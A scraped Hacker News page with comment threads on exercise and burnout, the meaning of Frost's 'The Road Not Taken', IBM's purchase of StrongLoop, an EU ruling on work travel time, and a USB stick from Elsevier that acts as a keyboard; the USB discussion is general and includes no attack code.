After a few years in the health industry, whenever I see a statement like this one:

Organisations wishing to proactively reduce burnout can do so by encouraging their employees to access regular exercise programs.

My brain translates the suggestion into real-world application, which in the US seems to go like this:

Organisations wishing to proactively increase wellness metrics and reduce their expenditures can do so by instituting highly invasive biometric screening programs and jacking up premiums, while offering no actual time or fiscal incentive to join a gym or exercise independently.

Quick apology if that sounds terribly cynical, but it seems like the go-to path by businesses. I say this as a person who feels grateful to have a job where I can go home and work out for 20 minutes 3 times during the work week. Also, I know that eating "better" takes time and effort both in the sourcing and production of materials, which may or may not be less expensive to the individual in the short/long term.

samstokes 3 days ago 3 replies      
My own anecdata definitely supports this study's conclusion. I wish I'd been in the habit of regular exercise when I first got into the startup scene.

That said, I fear the outcome of their recommendation:

> Organisations wishing to proactively reduce burnout can do so by encouraging their employees to access regular exercise programs.

If burnout is prevalent enough among an organisation's workforce for "proactively reducing" it to be strategically worthwhile, that suggests it would be much more important to introspect on why they are burning out so many of their employees in the first place. e.g. does your culture explicitly value "hard work", which can turn into encouraging unpaid overtime? When you celebrate hitting deadlines, do you look back on whether it was thanks to good planning or "crunch mode"? Do people understand the reasons for decisions that affect them?

Not that these are easy problems to fix, but I'd hate to see companies start thinking burnout is something that can be "fixed" with a gym discount and workout incentive schemes.

nutmeg 3 days ago 2 replies      
In a documentary about Studio Ghibli, they show every couple hours where everyone gets up from their desk and does calisthenics, even Miyazaki.

I don't know if this is common in Japan or just a Studio Ghibli practice, but I was impressed with the idea of it.

shostack 3 days ago 0 replies      
I'm very fortunate to work for a company that values health and wellness to the point where they provide workout facilities for employees and trainers twice a week.

I used to never go to a gym, and I'd be lucky if I could convince myself to do some bicep curls and situps/pushups at home in-between rounds of various games I play. I have weak discipline in that area. I've always had a high metabolism to the point where I was "scrawny", so I would never get fat from not working out, but I definitely felt the drain on my energy, and overall physical fitness and strength.

Since starting at this company, while I've lost 15 pounds (not something skinny people typically aim for), I've gained a ton of muscle, and am physically in the best shape I've been in my entire life.

The confidence that comes from that is one thing, but the increased energy and how it has helped me focus on work while reducing stress from juggling many balls are side benefits that were completely unexpected, and perhaps the greatest benefits. The fact that it was so noticeable to me was what really blew me away--it was literally night and day.

TBH, I likely wouldn't do this though if we just had the gym and no trainers--I'm one of those folks who needs someone giving them instructions in the gym and yelling at them when they are slacking or doing it wrong. I'd wager that this has driven a significant productivity boost for myself (and likely others here) because of the overall increase in energy. I also end up focusing on tough work problems I'm trying to solve during my workouts because of the amazing increase in focus I have, and it is amazing to be able to focus with that level of clarity.

It also probably helps cut down indirectly on insurance claims which is a nice plus.

In this day and age of always being connected, and having 50 million things to juggle at once, it is easy to be overwhelmed. There's something about a solid workout that just forces all of these extraneous thoughts from your head and lets you focus on 1-2 things that I personally attribute to helping reduce the risk of burnout.

The flip-side of course is ensuring proper work/life balance, and I'd say that is pretty healthy here as well (and was one of the deciding factors in me choosing to work here vs. elsewhere). Companies really need to embrace it and promote it as part of their culture, otherwise it becomes one of those things that they need to try to fit in along with everything else in an unsustainable way.

larkinrichards 3 days ago 0 replies      
As a long distance runner I have no doubt there's value to exercise. It pays to be healthy. It's also hard to stick to an exercise plan year round.

This is a small sample size study that only lasted 4 weeks. Anecdotally, longer duration exercise regimes can themselves result in burnout-- it's hard to make it a habit.

Perhaps the takeaway here is that a short-term exercise regimes can serve to distract you from the work that is burning you out?

stephendicato 3 days ago 0 replies      
Eat healthy food.Exercise.Get enough sleep.

You will feel better; both physically and mentally. Positive habit leads to more positive habit. Pay attention to how you feel. You don't need scientific studies to prove these things are "good" for you.

mangeletti 2 days ago 0 replies      
I workout at the Golds here in Jupiter, FL every day after work. It started, like many times before, as a, "That's it! I'm getting into shape!", back in February. I wanted to put on some muscle weight (went from 180lbs in Feb to now 208lbs; my goal is somewhere around here). Then, like very few times before, it became an addiction. The exhilaration of high speed running (I'll set the treadmill to 12mph and see how long I can run at that speed - usually no more than 1/4 mile), the feeling of accomplishment after weights (I do weights every day, treadmill is just my warmup).

My stress and anxiety (had serious anxiety since 2012 - drugs did nothing to help) have been reduced drastically. It's very strange because generalized anxiety disorder is more of an epinephrine issue, but when you have it it feels very much mental. It's not until you start finding relief from working out that you start to accept that it is truly a physiological issue. All the fears (worrying about loved ones, worrying about having some disease, worrying about job security, etc.) just fade away with each new workout. It just takes a couple months to get to this point.

gorena 3 days ago 5 replies      
How are you supposed to find time to exercise when you're working 10-12 hours a day? I can barely find time to clean my apartment.

And if you're not (can I have your job?), you're probably less likely to be burning out.

amelius 3 days ago 1 reply      
One tip: if you feel you are close to a burnout, sleep. Sleep a lot.
kazinator 3 days ago 5 replies      
The sense of well-being from endurance exercise such as running is phony, however. You're not solving any problems when you go for a run. (And I don't mean technical problems whereby you figure out some software bug while you're out covering the miles, which is great!)

Well, sure, you're temporarily solving the dependent problem of discomfort from the stress caused by problems, which is a problem itself.

You have to use the sense of well-being as a motivator to actually confront problems when you come back from the roads or trails, rather than as a "drug" to escape from them.

the-dude 3 days ago 1 reply      
So let me get this straight: at a place where they already burn you out, they will eventually force you to work even more by 'working out' ?

Uhhh, no thanks.

nazgulnarsil 2 days ago 0 replies      
If you're a person for whom efficiency is highly motivating:http://lesswrong.com/lw/juc/optimal_exercise/
nikolaj 3 days ago 0 replies      
It is nice to have NIH give us a good justification for having a surfboard rack in the office :)
languagehacker 3 days ago 0 replies      
Rad, now let's repeat it a few dozen times with a larger sample size, or it's an anecdote
zitterbewegung 2 days ago 0 replies      
I love working out. It is so much fun now I have so much more energy!
spacemanmatt 2 days ago 2 replies      
Wow, not one mention of yoga. It worked for me.
beachstartup 3 days ago 1 reply      
the best thing i've done in the past year is fork over a bunch of money to a personal barbell coach to get my ass up and into the gym on a regular schedule. he also supervises my general cardio routine.

i'm simply unable to do it myself without the external personal and financial accountability. but once the money changes hands, i look at it like a business transaction / work and it taps into a different set of motivations in my head.

if you've had false starts and other trouble getting on a resistance and cardio program, try hiring a good trainer. if you're intrinsically motivated to be fit, count your blessings.

tomjen3 3 days ago 8 replies      
At this point it would be news if exercise isn't beneficial for $CONCERN.

So the question is how, do we make it so that people want to get of their ass and exercise? Considering the general state of health in most first world countries (especially given the recent news that half of US adults are either diabetic or pre-diabetic), this may very well be the question in public health.

And yet we almost never see any research about this.

anti-shill 3 days ago 0 replies      
anything possible to get more work out of us can only be a Good Thing
cowardlydragon 3 days ago 1 reply      
The Most Misread Poem in America theparisreview.org
275 points by dnetesn  2 days ago   273 comments top 39
creeble 2 days ago 9 replies      
David Orr did a talk on NPR that was far less overwrought (http://www.pbs.org/newshour/bb/weve-gotten-wrong-robert-fros...) It got to the point quickly:

"DAVID ORR: He claims that he wrote it because he used to go on walks with the English poet Edward Thomas, because Frost spent a brief time in England. It was actually the beginning of his career as a poet.

And what he would like to say at readings afterward is that he and Thomas would go on these walks, and then Thomas, who has a somewhat more romantic sensibility than Frost, Thomas would always regret whatever path they had taken.

And then afterward, he would say, well, we really should have gone to the right. I could have shown you something over there. We should have gone to the left. I could show you something over there.

And Frost was very amused by this. And so he wrote the poem as a kind of joke at his friends expense."

In other words, it's more about regret than making the right choice, or that you deceive yourself sometimes by dwelling on a choice that is actually perfectly random. Or a million other interpretations...

Grue3 2 days ago 18 replies      
Has anyone considered that the roads are equally travelled precisely because every traveller chooses the less travelled path?

Could the poem actually be a commentary on load balancing?

aresant 2 days ago 3 replies      
What is truly meta is that this entire "misunderstanding" is CENTRAL to the Poem's popularity.

Variations of this story and headline have been popping up for years - like in the wonderfully informative "Top 10 Most Misunderstood Lines in Literary History" (1)

Or heck, as a monologue in Orange is the New Black (2)

Didn't see it there because you're too high-brow and busy, so saw it in business insider last year like me (3)?

The poem's dual-meaning is central to its popularization - similar to the "big reveal" that drove the Six Sense to become one of the top 100 grossing movies of all time.

(1) http://www.toptenz.net/top-10-most-misunderstood-lines-in-li...

(2) http://www.slate.com/blogs/browbeat/2013/08/15/orange_is_the...

(3) http://www.businessinsider.com/frosts-road-not-taken-poem-in...

(3) https://en.wikipedia.org/wiki/The_Road_Not_Taken

unoti 2 days ago 2 replies      
I never felt like the Road Not Taken was about individualism, even when I first read it in high school. To me it's about the fact that sometimes you have to make momentous decisions in life, in which neither choice is clearly right or wrong. Either way you choose, the choice is defensible, but once you make the choice, you can't go back. I decided to go into computers, instead of joining the Air Force and becoming a pilot, for example. Sometimes in life you will meet someone who clearly could have been your soulmate, but you decide to let the acquaintance lapse. I wanted to spend a couple of years in the Peace Corps, learn another language, and help people build power plants in remote locations, but I chose to get married and start making babies instead. And I look back on these kinds of choices and say I made the right choice. But no matter what choice you make, it makes all the difference. Isn't this what the poem is about?

Regardless of what the poet says, I think the important thing is to be out there on that road, travelling, and doing your best. It's all too easy to stay in your comfort zone forever rather than travelling.

Edit: corrected title. Apologies!

RodericDay 2 days ago 2 replies      
I tend to love articles that tease a bit before revealing what they're about, but I found this one a bit overwrought.

tl;dr: it's about Frost's "The Road Not Taken" (Two roads diverged in a wood, and I / I took the one less traveled by, / And that has made all the difference).

This article, at its clearest, says:

> Certainly its wrong to say that The Road Not Taken is a straightforward and sentimental celebration of individualism: This interpretation is contradicted by the poems own lines.

However, the thrust of the whole article is better captured by its soggy, everybody-wins non-conclusion:

> The poem both is and isnt about individualism, and it both is and isnt about rationalization. It isnt a wolf in sheeps clothing so much as a wolf that is somehow also a sheep, or a sheep that is also a wolf

jameshart 2 days ago 4 replies      
"It may be the best example in all of American culture of a wolf in sheeps clothing."

Not sure about that. I suspect Springsteen's Born in the USA takes that crown, or perhaps any number of satires that have been taken at face value (looking at you Paul Verhoeven).

a3n 2 days ago 1 reply      
It is in fact my favorite poem.

I've never thought of it as a triumph of choice, "See, it's because I chose thus!"

And I've never thought of it as self-deception, which I think is what the article says. A poem is in some sense our own, but to the extent that you can be wrong about a poem, I think this article is wrong.

I think it's merely a wonderful acknowledgement that choosing different paths do make a difference, even when it doesn't appear to matter at the time. Frost's character wasn't making an obviously important choice between the paths. But way did in fact lead to way, and life was probably different, partially determined, because of this metaphorical inconsequential choice of direction.

My other favorite Frost poem is "The Hired Man," from which we get the line "Home is the place where, when you have to go there, they have to let you in."

joaorico 2 days ago 0 replies      
Robert Frost himself wrote about this intentional light mocking [0]:

"I suppose I was gently teasing them." [1]

"but about a friend who had gone off to war, a person who, whichever road he went, would be sorry he didn't go the other." [2]



"On one occasion he [RF] told of receiving a letter from a grammar-school girl who asked a good question of him: 'Why the sigh?' That letter and that question, he said, had prompted an answer.Amherst Mass April 1925

"Dear Miss Yates:

No wonder you were a little puzzled over the end of my Road Not Taken. It was my rather private jest at the expense of those who might think I would yet live to be sorry for the way I had taken in life. I suppose I was gently teasing them. I'm not really a very regretful person, but for your solicitousness on my behalf I'myour friend alwaysRobert Frost"

[Finger, L. L.: "Frost's 'The Road Not Taken': a 1925 Letter come to Light", American Literature v.50]



"(a) One stanza of 'The Road Not Taken' was written while I was sitting on a sofa in the middle of England: Was found three or four years later, and I couldn't bear not to finish it. I wasn't thinking about myself there, but about a friend who had gone off to war, a person who, whichever road he went, would be sorry he didn't go the other. He was hard on himself that way. (RF, Bread Loaf Writers' Conference, 23 Aug. 1953; tape recording)."

"(c) Frost said that he wrote the poem, 'The Road Not Taken' for his friend [Edward Thomas] and sent it to him in France, getting the reply, 'What are you trying to do with me?' (L. Mertins: Robert Frost)"

[Thompson, Lawrance: Robert Frost: The Years of Triumph, Notes.]


[0] http://www.retiredtractors.com/Frost/Roadfrost.html

kazinator 2 days ago 0 replies      

 The Fork Not Taken Two spaces forged in the obscure core And sorry I could not both address And be one stream of loads and stores Blocked while tables copy, bored Yielded to the next process(0) I got the new one, once unblocked And having perhaps the better claim, Because it was COW(1), not yet untwained(2) Though as per that POSIX doc, The two should look about the same. --- 0. Not accurate. 1. Hay, cows like it grassy! 2. Naive misconception that there is a difference.

molotv 2 days ago 3 replies      
Clicked thru expecting it to be about "The Mending Wall" http://writing.upenn.edu/~afilreis/88/frost-mending.html

"Good fences make good neighbors." is often misused to mean the opposite of what it does in that poem.

...at least I guessed the poet correctly.

CurtMonash 2 days ago 1 reply      
My wife -- who has taught poetry at the college level as well as writing a whole lot of popular novels -- reminds me from time to time of the "intentional fallacy". What she means by that -- I think :) -- is that the author isn't the sole determinant of a work's meaning.

So (while she's unavailable to be asked at the moment) I'm pretty sure she'd agree that the poem is about both the things it's often claimed to be about. Indeed, some of the works she and I both admire the most are ones that work on several levels at once.

kej 2 days ago 1 reply      
Distantly related, The Road Not Taken is also an excellent short story by Harry Turtledove that the HN crowd would probably appreciate: http://www.eyeofmidas.com/scifi/Turtledove_RoadNotTaken.pdf
DarkTree 2 days ago 4 replies      
Similarly lost in meaning is Frost's "Stopping by Woods on a Snowy Evening" which is a beautiful poem, but many people don't see the suicidal undertone. I've had it memorized for years and only just learned about this.
injulkarnilesh 1 day ago 0 replies      
It's already been well explained in Orange is new black.Here https://www.youtube.com/watch?v=EAkYlhhFvbk
jsalit 2 days ago 0 replies      
Also presented here by John Green - https://www.youtube.com/watch?v=snQvRZ2vDHE
matt_morgan 2 days ago 1 reply      
Fantastic. It's not about tredding your own path. It's about how we embellish our own pasts. I didn't know.
andreaferretti 2 days ago 9 replies      
I may be ignorant, but I find weird that this is reported as the most famous poem of the 20th century in America, and possibly the world. In fact, I had never heard about it at all.

Honest question: is it that well-known? I don't think in Italy it is all that common. Or again, it may be just me...

midnightmonster 2 days ago 0 replies      
Frost's duplicity (sometimes triplicity, maybe more) is part of his charm. Yet if there were not also insight and beauty, I think the charm--the mere pleasure in being as clever as the speaker (if not as clever as the poet)--would wear thin.

I truly love Frost, but I love even more Gerard M Hopkins. One gets the feeling Hopkins resorts to dense layers of images not to share a joke with the sufficiently-clever reader, but in desperate earnestness to show what can't be said in prose. "Look--look! See this beautiful/terrible/mysterious thing!"

nsxwolf 2 days ago 1 reply      
If you have only the poem, the common interpretation is perfectly reasonable. Frost said the poem was "tricky", which is a clue from the poet that the common interpretation could be wrong. But what gives the poem meaning? Are you allowed to interpret it yourself? Or does the poet's obscured intent trump that?

In Blade Runner, Is Deckard really a Replicant just because Ridley Scott said so later? There's a few clues in various cuts of the film, but nothing is a slam dunk.

x0054 1 day ago 2 replies      
Ok, a honest question here. And English is my second language, so maybe this is why, but this middle part sounds like compleat nonsense to me. Is it just me and I don't know how to read poems? Is it how people used to talk back in the day?

> And both that morning equally lay> In leaves no step had trodden black.> Oh, I kept the first for another day!> Yet knowing how way leads on to way,> I doubted if I should ever come back.

I think I can understand the rest of the poem pretty well, but that 3rd stanza just sounds like random words just tossed together. No? Maybe I just don't get poems.

electricblue 2 days ago 1 reply      
It seems to me that the poem is more about regret than the stories we tell ourselves about our lives to make us feel better about the randomness of the universe. The poet desperately wants to know what would've happened (if anything) on the other side of the 'difference' but can never know.
marquis 2 days ago 0 replies      
The NZ ad mentioned: https://www.youtube.com/watch?v=1wwXfAFQoh8 NZ isn't a large country: those roads probably ran to the same town anyway).
adregan 2 days ago 0 replies      
I like to think that Roland Barthes would have loved to use "The Road Not Taken" in his piece "Death of the Author"[0]. Truly, at a scale that's frankly staggering, agency has been given to the readerthough one could also argue that the clipped version of the poem often remembered is a case of remixing and rewriting and that the agency isn't merely passive interpretation but a very active creative endeavor.

0: http://www.ubu.com/aspen/aspen5and6/threeEssays.html#barthes

aaroninsf 2 days ago 0 replies      
ITT: many well-spoken comments reflecting how different personality types (or if you prefer, ways of thinking, or, viewing or understanding the world...) have very different relationships to poetry.

No such codification is perfect, but I find the Meyers-Briggs binning a useful shorthand for understanding how different colleagues relate to the world (and respond in different ways to different kinds of problem, management strategy, social environment, etc...)...

...and in this thread there are comments which would make me bin people immediately. :)

(There are no good or bad bins; just differences.)

ap22213 2 days ago 1 reply      
I'm particular struck by the part

"...long I stoodAnd looked down one as far as I couldTo where it bent in the undergrowth;"

It reminds me of my over-analysis in developing software. Sometimes, I over think things, try to predict the outcomes of things, spend lots and lots of time considering what's behind the 'bend': what's the perfect solution. Analysis paralysis.

But, at a certain point, the analysis gives way to intuition. I choose the path that 'feels' best, knowing that many different paths could have been just as right.

kazinator 2 days ago 1 reply      
In a different category, the "most too-literally-applied" poem in American administration, however, is Emily Dickinson's Tell all the Truth but tell it slant--.
eggoa 2 days ago 0 replies      
I'd like to think that those who appropriate the poem for car commercials and such and fully aware of the poem's meaning, but are exercising a subversive irony.
jmadsen 2 days ago 0 replies      
I'll allow myself a semi-related tangent, just for the heck of it.

Another similar example of misunderstanding well-known lines from literature is Shakespeare's "Now is the winter of our discontent..", which everyone quotes meaning we are in dark times...

Except it is the opposite - "Now is the winter of our discontent made glorious summer by this Son of York.." is the full line.

kendallpark 2 days ago 1 reply      
YES. I love the fact that someone has written about this.

I remember reading the full poem in high school and we were like, "That's... not the poem I thought it was."

werber 2 days ago 1 reply      
American nihilism is so often mistaken for something else
code_sterling 2 days ago 0 replies      
We spent a week discussing the possible meanings in college. And each was as valid as any other interpretation, this one was mentioned, but it was clear that none were more valid than any other. You can't get a poem wrong, just like you can't interpret a painting wrong. And artist will be inspired to create, but what that means to the observer, is personal between them, and the work.
Randgalt 2 days ago 2 replies      
Why should I believe David Orr? His argument is slim and I disagree with his conclusion. I read the poem again after reading Orr's article and it has the same meaning as it always has for me: go your own way and it will make all the difference. We will never know Frost's true intentions and, frankly, it doesn't matter. The words are the words regardless of what he intended.
bastijn 2 days ago 1 reply      
And here I am. At the end of a comment feed with many opinions about a poem everybody knows. Wondering if I should have known this poem before I read it today for the first time. Or if I could wave it away as just a USA thing. Written by USA who falsely claims everybody outside US also knows the poem. Pondering, which road did I take?
musesum 2 days ago 0 replies      
This or that? I would bet: either way, one regret.

Until now, this thought will vet a better look.

The past is done; the future not set.

Just keep on going, and watch your step.

giltleaf 2 days ago 1 reply      
The whole argument of the article establishes a false dichotomy. While I'm sure there are some people who can play the role both of the sheep and the literary insiders (as in the author's description), I'm sure most people, like the author, fall somewhere in the middle with their interpretation.
jmount 2 days ago 0 replies      
It is like they started the essay before they knew they could actually come to a coherent point.
markbnj 1 day ago 0 replies      
If art has a downside, it may be in the fact that there is always some very smart person at hand to analyze it for you and explain why you don't understand it.
undershirt 2 days ago 0 replies      
looks like the annotations on genius have this interpretation as well: http://genius.com/46404
vijucat 1 day ago 0 replies      
Two roads diverged in a wood, and I took the one that was less popular on Google

That was not a smart move

(With apologies to Frost fans).

What the IBM Acquisition of StrongLoop Means for the Node.js Community strongloop.com
244 points by ijroth  3 days ago   126 comments top 29
rynop 3 days ago 2 replies      
former IBM dev here (6 years in different areas). I hope they let you work on an island and don't force you to use their tooling/approve listed of open source software.

IBM has long embraced the OSS community (I loved LTC), but the process to release/use anything OSS was not good (to put it nicely) and was one of the many reasons I left.

I worked on a project that was on an island, and while it was more efficient than normal IBM dev, it was still 10x slower and tons of red tape then what was required to make a competitive product (and stay competitive). IBM is big and ultimately has to protect themselves - IMO ultimately it gets in your way of making a good/competitive product.

I like what StrongLoop does for the node community, and I do indeed hope you are successful and nothing changes. But to be honest I am very skeptical.

tracker1 3 days ago 0 replies      
As much as I fear this will drag StrongLoop, I feel that this is an excellent fit. StrongLoop has been focused on building "Enterprise" tools and module around node, as well as working on whitelisting/reviewing various modules... This is a good fit for IBM and their clients who are inclined to also want to have "approved" or "certified" modules to be able to use separately from the rest of npm.

As much as I like the power/openness of npm, a lot of corporate environments move more slowly... modules need to be cleared by legal and usually limited to specific versions. Having more resources to do this is a good thing and can only help people who are working for financial institutions (as an example).

mbesto 3 days ago 5 replies      
> And its not just Node.js. Maybe you havent looked at what IBM is doing with open source lately. I was surprised when I dug in. For example, did you know they are leading contributors to:

LinuxOpenStackCloud FoundryDockerplus many Apache projects like Spark, Cordova and Hadoopand of course, Node

They are? (keyword => "leading")



I find this claim dubious. Maybe I'm not digging hard enough.

mbubb 3 days ago 2 replies      
From the customer side - I dealt with Netezza and Softlayer before and after IBM acquisition. In both cases an almost palpable drain in support and intelligence. I hate to say it like that as i know that there are brilliant folks in IBM (Watson, etc)

Softlayer and Netezza in different ways were smart, nimble and fearless companies. You had real relationships with the engineers. I got to know Netezza folks in Massachusetts, Poland and Australia - some of the smartest folks I've met. They shared scripts and passionate expertise.

IBM took it over and the bureaucracy set in. The term "TAM" brings tears of rage to my eyes... Opening a support ticket is about as hard as applying for a mortgage online. And they want to have these endless conference calls with 7 or 8 folks from their side. And nothing gets done.

I am embarrassed about the way I have acted on these calls. I have called folks out and out liars. I have screamed at and bashed conference phones.

Maybe it would have been better if I hadn't known the Netezza folks - they were good.

And Softlayer...

I used to be able to call a guy down in texas and after a 20 minute phone call have a cluster of servers ordered. Once did a hadoop cluster this way. Go off and have lunch come back and the servers would we ready by the afternoon.

And now: 2 major outages in the past 2 months. No communication - in both cases entirely their fault. Power failure and network misconfig causing an arp storm. Ignored for hours while we submitted tickets and called support... Nightmare.

And an absurd situation where their security dept threatened us with taking an haproxy server offline due to a clean-mx false positive - even after the tireless guy running clean-mx emailed to that effect...

It became apparent in the discussions following this event that the TAM and sales support which has had our account for years, knew nothing about our business.

Just horrible bureacracy and bad service.

So I have had really negative experiences with 2 IBM acquired companies. Hopefully it will be better for StrongLoop.

For anyone affected - watch for the good folks shedding off.

funkysquid 3 days ago 1 reply      
If you're trying to relieve fears, the first paragraph does not help.

"IBM has identified Node.js as an important part of the future of enterprise middleware and StrongLoops technology and expertise as pivotal to their strategy to help companies fully unlock the value of their existing IT investments and legacy data with APIs."

osullivj 3 days ago 5 replies      
I used to work with an old IBMer who used to say "it's no accident that IBM nearly collapsed at the same time as the Soviet Union did". Lou Gerstner famously rescued IBM from oblivion by turning it into a consultancy led company, and moving the focus away from mainframes. This is just a case of IBM snaffling up the latest cool thing so they can sell consulting services.
oneweekwonder 3 days ago 0 replies      
Recently I got heavily into node-red[0] after playing with a ti sensortag[1], and I'm really amazed at what it can do, and that it is open source and actively used by IBM in bluemix.

Now they acquired another heavy weight in the js world, I wonder what is their next step.

On a side note, to the audience: have you looked at node-red, what do you think of it?

[0]: http://nodered.org/[1]: http://www.ti.com/sensortag

ps. if you run node-red locally note by default it is insecure, you need to setup the config. But really it is a must try!

OldSchoolJohnny 3 days ago 1 reply      
IBM recently bought out Softlayer hosting and support went from great to glacially slow and all but uncaring in about 28 seconds.
rogerthis 3 days ago 2 replies      
Once I worked in a project which IBM was also involved. And everything in IBM related to that project was slow, very slow.
aikah 3 days ago 0 replies      
Congrats , I know nothing about "modern" IBM but it seems like they are trying interesting things with Bluemix. Let's see what happens next.
athenot 3 days ago 0 replies      
This announcement fits along with Node.js 4.0's release containing a commitment to an 18-month roadmap in giving Node.js a greater maturity.

As much as I like to think I have chosen Node.js purely for its merits, having a wide community who adopts a platform brings a few perks:

- Hiring developers requires less of a gamble on their part. Elixir looks very promising and probably has a lot of advantages over Node.js thanks to it's Erlang foundation but it makes it harder to assemble a teamI hope this changes as I wish the Erlang/Elixir folks all the best.

- There is a great amount of wealth contained in the package repository NPM. Before Node.js, this was a great strength of Perl's CPAN (and TeX' CTAN before that).

- Having large organizations adopt a platform will eventually increase OSS contributions.

I could be mistaken but I don't see Node.js following the bureaucratic of Java's JSR if it continues to adopt a lean and mean approach akin to UNIX tools (do 1 thing well).

cdnsteve 3 days ago 1 reply      
If anything this is a strong validation of Node.js in the enterprise space. This is actually good news for anyone working within the enterprise trying to use a different technology set. It makes selling Node to a CTO a bit easier (even if you choose not to use StrongLoop).
mkozlows 3 days ago 0 replies      
I realize this blog post is full of optimistic "nothing will change!" statements, but that doesn't seem super-IBM-like.
kordless 3 days ago 1 reply      
Congratulations Issac! Happy for you and the team.
Aldo_MX 3 days ago 1 reply      
If IBM screws ExpressJS up (wishfully not), Hapi[1] is a good alternative.


codingdave 3 days ago 0 replies      
It is hard to say what this means at this stage...

IBM develops products that it acquires based on where IBM needs the product to go. Sometimes that matches where the user community wants it to go, sometimes it does not. But they will put resources behind it, and it will change - we just need to give it time to see what direction that change takes things.

ramigb 3 days ago 1 reply      
Just a question -might be dumb- is the merger of io.js and node.js which happened a couple of months ago related to this news in anyway? Anyways IMHO this good news and I hope it will make node.js much better, who knows maybe replace V8 with something even better.
amelius 3 days ago 2 replies      
What node.js needs is a better way to manage packages. Right now, upgrading can fail with no way to roll back. Also, reproducibility is missing. E.g, it is not easy to download sources, and deploy those exact same sources on different machines.
potch 3 days ago 0 replies      
I imagine it doesn't mean much beyond some more b2b uses of Node. Node has its own independent governance and nothing about this acquisition changes that.
mhd 3 days ago 0 replies      
Well, at least it's not Oracle
ilurkedhere 3 days ago 0 replies      
IBM Nodesphere.
jacques_chester 3 days ago 0 replies      
> Making sure that Node.js is a first class citizen on Softlayer and BlueMix

BlueMix is a Cloud Foundry installation. Is there a separate BlueMix-specific thing that is distinct from the Node.js buildpack?[0]

[0] https://github.com/cloudfoundry/nodejs-buildpack

curiousjorge 3 days ago 1 reply      
so how much was it acquired for?
wslh 3 days ago 2 replies      
Sorry for the joke but how many callbacks did they need to make this transaction?
atorralb 3 days ago 1 reply      
geniium 3 days ago 0 replies      
frandroid 3 days ago 0 replies      
meesles 3 days ago 2 replies      
Travelling to work 'is work', European court rules bbc.com
230 points by wj  3 days ago   133 comments top 18
furyg3 2 days ago 4 replies      
In the US, I worked for a consulting group in the bay area (Fremont). There was a big discussion about whether or not we were on the clock while driving to client sites, because some people wanted to live in Tracy and other people closer to the office, and the client sites were all over the place. So how to calculate this?

One way to do it was just to say you have to show up to the the Fremont office before going anywhere ('fixed office'), but this can be wasteful for everyone, since the client site can be in the opposite direction of the office. The final agreement was that the time it would have taken you to get to/from the office was your own time, and from then on you're on the clock and paid.

So if you live next to the office and get sent somewhere, your whole commute time to that place is paid. If you want to live in Tracy and drive an hour into work, that's ok, but your commute to the client site is only paid if it's longer than an hour or so. If you had to go to two client sites in a single day, the time between the client sites was always paid.

Nobody really had any idea if this was legal or not, but all of the consultants agreed it was very fair.

roel_v 2 days ago 1 reply      
The article's headline is not in line with the ruling of course, but it's not even what most people in this thread are assuming. The ECJ's rulings are to be interpreted very narrowly. In this specific circumstance, the company closed an office after which people had longer commutes. So this ruling in no shape or form means that people who took a job with a certain commute now all of a sudden will be paid for that commute! It's only the people where, through the choice of the employer, the commute has become longer, who can use this as a precedent. Precedent case facts matter a lot!
lfowles 3 days ago 5 replies      
> Time spent travelling to and from first and last appointments by workers without a fixed office should be regarded as working time, the European Court of Justice has ruled

Oh well.

xacaxulu 2 days ago 2 replies      
The best thing about being a consultant and running your own business is that every expense or spent time around work is considered WORK. As a basic employee in the US, you never get these sort of benefits and write-offs. When I hear people commuting 1 hour to work, that means they work 50 hours a week (assuming a 40 hours at the office). Their hourly rate is effectively much lower.
century19 2 days ago 5 replies      
I guess this should also apply to work trips then? I knew one guy who would only book a flight from 9am on Monday mornings, rather than being pressured into Sunday night or sillyAM Monday morning.

When I told other people who travel for work abot this the response was pretty much that he should be fired.

Retra 3 days ago 1 reply      
Makes sense; nobody is going to tell you it's not your job to get somewhere you are being payed to be.
zhte415 2 days ago 1 reply      
Tangential, but related to the headline:

In China, if an employee has an accident on the way to work, the employer is required to provide care and compensation (not liability compensation, just regular employee compensation) just as if the accident had happened in the workplace.

This ruling was made in 2013.

DanBC 3 days ago 3 replies      
I'm a bit confused how they claim this has no effect on UK minimum wage workers.

If that travel time counts towards my 48 hours max working hours why doesn't it also count as time I should be paid for?

jksmith 2 days ago 1 reply      
Start the autonomous car, let it send a "punch the clock" event to work.

Status: 1) Remote2) in office3) working, in route?

Additionally, only accept meetings when status is 3).

simonjgreen 1 day ago 0 replies      
This is for people without fixed offices eg travelling salespeople etc. This is not saying your daily commute is work. The title of this submission is very misleading
conceit 1 day ago 0 replies      
My place of work is fixed, but it's not an office. So, does this apply to me? :
rockdoe 2 days ago 5 replies      
Does this apply to consultants going to a customer (where they may be for a longer period of time)?
leovonl 2 days ago 0 replies      
Clickbait title.
bullen 2 days ago 1 reply      
supriyarao 2 days ago 1 reply      
D_Alex 2 days ago 1 reply      
wavefunction 3 days ago 1 reply      
Frozenlock 2 days ago 3 replies      
Elsevier, that just freaked me out swaldman.dreamwidth.org
282 points by phreeza  2 days ago   137 comments top 24
adrianN 2 days ago 2 replies      
Plugging things in your USB port has been known as a dangerous activity for quite some time.[1,2] It's surprising that someone at Elsevier thought it would be a good idea to use these techniques though.

[1] https://srlabs.de/badusb

[2] https://media.blackhat.com/bh-dc-11/Larimer/BlackHat_DC_2011...

jordigh 2 days ago 6 replies      
Can we have a usb condom for this situation? The actual product called "usb condom" is about charging phones and blocking all data pins on the usb drive. Can we have one that will only allow devices to connect as mass storage devices, or is this at odds with the usb protocol?
jimrandomh 2 days ago 4 replies      
This is an operating system problem. When a new device is plugged in and claims to be a keyboard, it should lock the screen and not be accepted as input until it has typed the user's login password.
brillenfux 2 days ago 2 replies      
So will this USB firmware situation eventually be solved in some newer version or are we all just silently ignoring this?

Because this makes USB an absolute NO in some environments (and for quite a while now).

It would be nice if we could use USB again at some point

jimrandomh 2 days ago 1 reply      
Distributing a USB device that pretends to be a keyboard and types commands is somewhere between faux pas and criminal hacking attempt. Even if the intent was innocent, it has to be investigated like a breakin to be sure. In this case it sounds like it was closer to the faux pas side.
upofadown 2 days ago 1 reply      
I suspect that a legal approach might work here. Elsevier was being deliberately misleading and was deliberately making a computer do something that the owner of that computer had not authorized. There must be some computer crime statute they could be charged under.
jgrahamc 2 days ago 0 replies      
I made a thing like this for the office with an Arduino Trinket: https://github.com/jgrahamc/missile_command
sp332 2 days ago 1 reply      
I wonder if it's hard-coded or if you could make it do something else. Hak5 has been selling programmable versions of these for a while. http://hakshop.myshopify.com/collections/usb-rubber-ducky/pr...
ozzmotik 2 days ago 1 reply      
not sure if this has been mentioned, but this sounds like the Rubber Ducky


just contributing something of interest.

